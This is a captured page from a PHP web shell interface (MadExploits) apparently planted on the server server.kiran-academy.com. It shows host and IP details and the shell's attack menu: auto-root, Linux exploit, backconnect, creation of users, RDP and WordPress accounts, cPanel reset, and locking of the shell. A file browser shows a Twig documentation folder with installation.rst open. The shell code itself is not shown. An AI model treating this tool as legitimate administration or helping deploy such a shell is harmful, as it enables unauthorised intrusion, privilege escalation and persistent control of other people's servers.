Linux server.kiran-academy.com 3.10.0-1160.108.1.el7.x86_64 #1 SMP Thu Jan 25 16:17:31 UTC 2024 x86_64
Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
: 194.233.91.196 | : 216.73.216.216
Cant Read [ /etc/named.conf ]
7.4.32
finalho
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
local /
cwpsrv /
var /
services /
twig /
doc /
[ HOME SHELL ]
Name
Size
Permission
Action
filters
[ DIR ]
drwxr-xr-x
functions
[ DIR ]
drwxr-xr-x
tags
[ DIR ]
drwxr-xr-x
tests
[ DIR ]
drwxr-xr-x
advanced.rst
27.58
KB
-rw-r--r--
api.rst
18.93
KB
-rw-r--r--
coding_standards.rst
2.33
KB
-rw-r--r--
deprecated.rst
304
B
-rw-r--r--
index.rst
220
B
-rw-r--r--
installation.rst
907
B
-rw-r--r--
internals.rst
4.36
KB
-rw-r--r--
intro.rst
2.45
KB
-rw-r--r--
recipes.rst
17.06
KB
-rw-r--r--
templates.rst
26.27
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : installation.rst
Installation ============ You have multiple ways to install Twig. Installing the Twig PHP package ------------------------------- Installing via Composer (recommended) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Install `Composer`_ and run the following command to get the latest version: .. code-block:: bash composer require twig/twig:~2.0 Installing from the tarball release ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 1. Download the most recent tarball from the `download page`_ 2. Verify the integrity of the tarball http://fabien.potencier.org/article/73/signing-project-releases 3. Unpack the tarball 4. Move the files somewhere in your project Installing the development version ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ .. code-block:: bash git clone git://github.com/twigphp/Twig.git .. _`download page`: https://github.com/twigphp/Twig/tags .. _`Composer`: https://getcomposer.org/download/
Close